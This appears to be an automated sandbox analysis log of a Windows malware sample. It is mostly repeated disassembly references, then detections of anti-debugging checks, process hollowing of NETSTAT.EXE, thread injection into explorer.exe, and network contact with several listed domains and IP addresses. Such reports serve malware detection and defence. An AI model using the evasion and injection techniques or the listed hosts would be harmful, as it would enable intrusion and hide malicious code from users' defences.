            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDFE87 mov eax, dword ptr fs:[00000030h]18_2_02DDFE87
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5AAB0 mov eax, dword ptr fs:[00000030h]18_2_02D5AAB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5AAB0 mov eax, dword ptr fs:[00000030h]18_2_02D5AAB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7FAB0 mov eax, dword ptr fs:[00000030h]18_2_02D7FAB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D452A5 mov eax, dword ptr fs:[00000030h]18_2_02D452A5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D452A5 mov eax, dword ptr fs:[00000030h]18_2_02D452A5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D452A5 mov eax, dword ptr fs:[00000030h]18_2_02D452A5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D452A5 mov eax, dword ptr fs:[00000030h]18_2_02D452A5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D452A5 mov eax, dword ptr fs:[00000030h]18_2_02D452A5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC46A7 mov eax, dword ptr fs:[00000030h]18_2_02DC46A7
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E18A62 mov eax, dword ptr fs:[00000030h]18_2_02E18A62
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DD4257 mov eax, dword ptr fs:[00000030h]18_2_02DD4257
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D49240 mov eax, dword ptr fs:[00000030h]18_2_02D49240
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D49240 mov eax, dword ptr fs:[00000030h]18_2_02D49240
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D49240 mov eax, dword ptr fs:[00000030h]18_2_02D49240
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D49240 mov eax, dword ptr fs:[00000030h]18_2_02D49240
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D57E41 mov eax, dword ptr fs:[00000030h]18_2_02D57E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D57E41 mov eax, dword ptr fs:[00000030h]18_2_02D57E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D57E41 mov eax, dword ptr fs:[00000030h]18_2_02D57E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D57E41 mov eax, dword ptr fs:[00000030h]18_2_02D57E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D57E41 mov eax, dword ptr fs:[00000030h]18_2_02D57E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D57E41 mov eax, dword ptr fs:[00000030h]18_2_02D57E41
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D8927A mov eax, dword ptr fs:[00000030h]18_2_02D8927A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6AE73 mov eax, dword ptr fs:[00000030h]18_2_02D6AE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6AE73 mov eax, dword ptr fs:[00000030h]18_2_02D6AE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6AE73 mov eax, dword ptr fs:[00000030h]18_2_02D6AE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6AE73 mov eax, dword ptr fs:[00000030h]18_2_02D6AE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6AE73 mov eax, dword ptr fs:[00000030h]18_2_02D6AE73
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5766D mov eax, dword ptr fs:[00000030h]18_2_02D5766D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DFB260 mov eax, dword ptr fs:[00000030h]18_2_02DFB260
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DFB260 mov eax, dword ptr fs:[00000030h]18_2_02DFB260
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D63A1C mov eax, dword ptr fs:[00000030h]18_2_02D63A1C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7A61C mov eax, dword ptr fs:[00000030h]18_2_02D7A61C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7A61C mov eax, dword ptr fs:[00000030h]18_2_02D7A61C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4C600 mov eax, dword ptr fs:[00000030h]18_2_02D4C600
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4C600 mov eax, dword ptr fs:[00000030h]18_2_02D4C600
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4C600 mov eax, dword ptr fs:[00000030h]18_2_02D4C600
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D78E00 mov eax, dword ptr fs:[00000030h]18_2_02D78E00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D58A0A mov eax, dword ptr fs:[00000030h]18_2_02D58A0A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DFFE3F mov eax, dword ptr fs:[00000030h]18_2_02DFFE3F
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4E620 mov eax, dword ptr fs:[00000030h]18_2_02D4E620
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D837F5 mov eax, dword ptr fs:[00000030h]18_2_02D837F5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D58794 mov eax, dword ptr fs:[00000030h]18_2_02D58794
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E15BA5 mov eax, dword ptr fs:[00000030h]18_2_02E15BA5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7B390 mov eax, dword ptr fs:[00000030h]18_2_02D7B390
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC7794 mov eax, dword ptr fs:[00000030h]18_2_02DC7794
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC7794 mov eax, dword ptr fs:[00000030h]18_2_02DC7794
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC7794 mov eax, dword ptr fs:[00000030h]18_2_02DC7794
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D51B8F mov eax, dword ptr fs:[00000030h]18_2_02D51B8F
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D51B8F mov eax, dword ptr fs:[00000030h]18_2_02D51B8F
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DFD380 mov ecx, dword ptr fs:[00000030h]18_2_02DFD380
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E0138A mov eax, dword ptr fs:[00000030h]18_2_02E0138A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E18F6A mov eax, dword ptr fs:[00000030h]18_2_02E18F6A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4F358 mov eax, dword ptr fs:[00000030h]18_2_02D4F358
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4DB40 mov eax, dword ptr fs:[00000030h]18_2_02D4DB40
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5EF40 mov eax, dword ptr fs:[00000030h]18_2_02D5EF40
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D73B7A mov eax, dword ptr fs:[00000030h]18_2_02D73B7A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D73B7A mov eax, dword ptr fs:[00000030h]18_2_02D73B7A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4DB60 mov ecx, dword ptr fs:[00000030h]18_2_02D4DB60
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5FF60 mov eax, dword ptr fs:[00000030h]18_2_02D5FF60
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E18B58 mov eax, dword ptr fs:[00000030h]18_2_02E18B58
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6F716 mov eax, dword ptr fs:[00000030h]18_2_02D6F716
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDFF10 mov eax, dword ptr fs:[00000030h]18_2_02DDFF10
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDFF10 mov eax, dword ptr fs:[00000030h]18_2_02DDFF10
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7A70E mov eax, dword ptr fs:[00000030h]18_2_02D7A70E
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7A70E mov eax, dword ptr fs:[00000030h]18_2_02D7A70E
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7E730 mov eax, dword ptr fs:[00000030h]18_2_02D7E730
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E1070D mov eax, dword ptr fs:[00000030h]18_2_02E1070D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E1070D mov eax, dword ptr fs:[00000030h]18_2_02E1070D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D44F2E mov eax, dword ptr fs:[00000030h]18_2_02D44F2E
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D44F2E mov eax, dword ptr fs:[00000030h]18_2_02D44F2E
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E0131B mov eax, dword ptr fs:[00000030h]18_2_02E0131B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDB8D0 mov eax, dword ptr fs:[00000030h]18_2_02DDB8D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDB8D0 mov ecx, dword ptr fs:[00000030h]18_2_02DDB8D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDB8D0 mov eax, dword ptr fs:[00000030h]18_2_02DDB8D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDB8D0 mov eax, dword ptr fs:[00000030h]18_2_02DDB8D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDB8D0 mov eax, dword ptr fs:[00000030h]18_2_02DDB8D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDB8D0 mov eax, dword ptr fs:[00000030h]18_2_02DDB8D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E014FB mov eax, dword ptr fs:[00000030h]18_2_02E014FB
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC6CF0 mov eax, dword ptr fs:[00000030h]18_2_02DC6CF0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC6CF0 mov eax, dword ptr fs:[00000030h]18_2_02DC6CF0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC6CF0 mov eax, dword ptr fs:[00000030h]18_2_02DC6CF0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E18CD6 mov eax, dword ptr fs:[00000030h]18_2_02E18CD6
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5849B mov eax, dword ptr fs:[00000030h]18_2_02D5849B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D49080 mov eax, dword ptr fs:[00000030h]18_2_02D49080
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC3884 mov eax, dword ptr fs:[00000030h]18_2_02DC3884
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC3884 mov eax, dword ptr fs:[00000030h]18_2_02DC3884
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7F0BF mov ecx, dword ptr fs:[00000030h]18_2_02D7F0BF
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7F0BF mov eax, dword ptr fs:[00000030h]18_2_02D7F0BF
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7F0BF mov eax, dword ptr fs:[00000030h]18_2_02D7F0BF
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D890AF mov eax, dword ptr fs:[00000030h]18_2_02D890AF
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D60050 mov eax, dword ptr fs:[00000030h]18_2_02D60050
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D60050 mov eax, dword ptr fs:[00000030h]18_2_02D60050
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDC450 mov eax, dword ptr fs:[00000030h]18_2_02DDC450
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DDC450 mov eax, dword ptr fs:[00000030h]18_2_02DDC450
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E02073 mov eax, dword ptr fs:[00000030h]18_2_02E02073
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E11074 mov eax, dword ptr fs:[00000030h]18_2_02E11074
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7A44B mov eax, dword ptr fs:[00000030h]18_2_02D7A44B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6746D mov eax, dword ptr fs:[00000030h]18_2_02D6746D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC7016 mov eax, dword ptr fs:[00000030h]18_2_02DC7016
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC7016 mov eax, dword ptr fs:[00000030h]18_2_02DC7016
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC7016 mov eax, dword ptr fs:[00000030h]18_2_02DC7016
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC6C0A mov eax, dword ptr fs:[00000030h]18_2_02DC6C0A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC6C0A mov eax, dword ptr fs:[00000030h]18_2_02DC6C0A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC6C0A mov eax, dword ptr fs:[00000030h]18_2_02DC6C0A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC6C0A mov eax, dword ptr fs:[00000030h]18_2_02DC6C0A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]18_2_02E01C06
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]18_2_02E01C06
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]18_2_02E01C06
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]18_2_02E01C06
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]18_2_02E01C06
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]18_2_02E01C06
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]18_2_02E01C06
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]18_2_02E01C06
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]18_2_02E01C06
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]18_2_02E01C06
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]18_2_02E01C06
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]18_2_02E01C06
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]18_2_02E01C06
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E01C06 mov eax, dword ptr fs:[00000030h]18_2_02E01C06
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E1740D mov eax, dword ptr fs:[00000030h]18_2_02E1740D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E1740D mov eax, dword ptr fs:[00000030h]18_2_02E1740D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E1740D mov eax, dword ptr fs:[00000030h]18_2_02E1740D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E14015 mov eax, dword ptr fs:[00000030h]18_2_02E14015
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E14015 mov eax, dword ptr fs:[00000030h]18_2_02E14015
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7BC2C mov eax, dword ptr fs:[00000030h]18_2_02D7BC2C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5B02A mov eax, dword ptr fs:[00000030h]18_2_02D5B02A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5B02A mov eax, dword ptr fs:[00000030h]18_2_02D5B02A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5B02A mov eax, dword ptr fs:[00000030h]18_2_02D5B02A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5B02A mov eax, dword ptr fs:[00000030h]18_2_02D5B02A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DF8DF1 mov eax, dword ptr fs:[00000030h]18_2_02DF8DF1
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4B1E1 mov eax, dword ptr fs:[00000030h]18_2_02D4B1E1
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4B1E1 mov eax, dword ptr fs:[00000030h]18_2_02D4B1E1
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4B1E1 mov eax, dword ptr fs:[00000030h]18_2_02D4B1E1
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DD41E8 mov eax, dword ptr fs:[00000030h]18_2_02DD41E8
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5D5E0 mov eax, dword ptr fs:[00000030h]18_2_02D5D5E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5D5E0 mov eax, dword ptr fs:[00000030h]18_2_02D5D5E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7FD9B mov eax, dword ptr fs:[00000030h]18_2_02D7FD9B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7FD9B mov eax, dword ptr fs:[00000030h]18_2_02D7FD9B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7A185 mov eax, dword ptr fs:[00000030h]18_2_02D7A185
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6C182 mov eax, dword ptr fs:[00000030h]18_2_02D6C182
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D42D8A mov eax, dword ptr fs:[00000030h]18_2_02D42D8A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D42D8A mov eax, dword ptr fs:[00000030h]18_2_02D42D8A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D42D8A mov eax, dword ptr fs:[00000030h]18_2_02D42D8A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D42D8A mov eax, dword ptr fs:[00000030h]18_2_02D42D8A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D42D8A mov eax, dword ptr fs:[00000030h]18_2_02D42D8A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D71DB5 mov eax, dword ptr fs:[00000030h]18_2_02D71DB5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D71DB5 mov eax, dword ptr fs:[00000030h]18_2_02D71DB5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D71DB5 mov eax, dword ptr fs:[00000030h]18_2_02D71DB5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D735A1 mov eax, dword ptr fs:[00000030h]18_2_02D735A1
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D761A0 mov eax, dword ptr fs:[00000030h]18_2_02D761A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D761A0 mov eax, dword ptr fs:[00000030h]18_2_02D761A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D67D50 mov eax, dword ptr fs:[00000030h]18_2_02D67D50
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6B944 mov eax, dword ptr fs:[00000030h]18_2_02D6B944
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6B944 mov eax, dword ptr fs:[00000030h]18_2_02D6B944
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D83D43 mov eax, dword ptr fs:[00000030h]18_2_02D83D43
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DC3540 mov eax, dword ptr fs:[00000030h]18_2_02DC3540
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6C577 mov eax, dword ptr fs:[00000030h]18_2_02D6C577
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6C577 mov eax, dword ptr fs:[00000030h]18_2_02D6C577
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4B171 mov eax, dword ptr fs:[00000030h]18_2_02D4B171
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4B171 mov eax, dword ptr fs:[00000030h]18_2_02D4B171
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4C962 mov eax, dword ptr fs:[00000030h]18_2_02D4C962
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D49100 mov eax, dword ptr fs:[00000030h]18_2_02D49100
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D49100 mov eax, dword ptr fs:[00000030h]18_2_02D49100
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D49100 mov eax, dword ptr fs:[00000030h]18_2_02D49100
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E18D34 mov eax, dword ptr fs:[00000030h]18_2_02E18D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]18_2_02D53D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]18_2_02D53D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]18_2_02D53D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]18_2_02D53D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]18_2_02D53D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]18_2_02D53D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]18_2_02D53D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]18_2_02D53D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]18_2_02D53D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]18_2_02D53D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]18_2_02D53D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]18_2_02D53D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D53D34 mov eax, dword ptr fs:[00000030h]18_2_02D53D34
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4AD30 mov eax, dword ptr fs:[00000030h]18_2_02D4AD30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DCA537 mov eax, dword ptr fs:[00000030h]18_2_02DCA537
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D74D3B mov eax, dword ptr fs:[00000030h]18_2_02D74D3B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D74D3B mov eax, dword ptr fs:[00000030h]18_2_02D74D3B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D74D3B mov eax, dword ptr fs:[00000030h]18_2_02D74D3B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7513A mov eax, dword ptr fs:[00000030h]18_2_02D7513A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7513A mov eax, dword ptr fs:[00000030h]18_2_02D7513A
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D64120 mov eax, dword ptr fs:[00000030h]18_2_02D64120
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D64120 mov eax, dword ptr fs:[00000030h]18_2_02D64120
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D64120 mov eax, dword ptr fs:[00000030h]18_2_02D64120
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D64120 mov eax, dword ptr fs:[00000030h]18_2_02D64120
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D64120 mov ecx, dword ptr fs:[00000030h]18_2_02D64120
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_00409B30 LdrLoadDll,6_2_00409B30
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.instatechnovelz.com
            Source: C:\Windows\explorer.exeNetwork Connect: 172.65.227.72 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.apricitee.com
            Source: C:\Windows\explorer.exeDomain query: www.shacksolid.com
            Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.brondairy.com
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: B70000Jump to behavior
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeThread register set: target process: 3472Jump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeThread register set: target process: 3472Jump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3472Jump to behavior
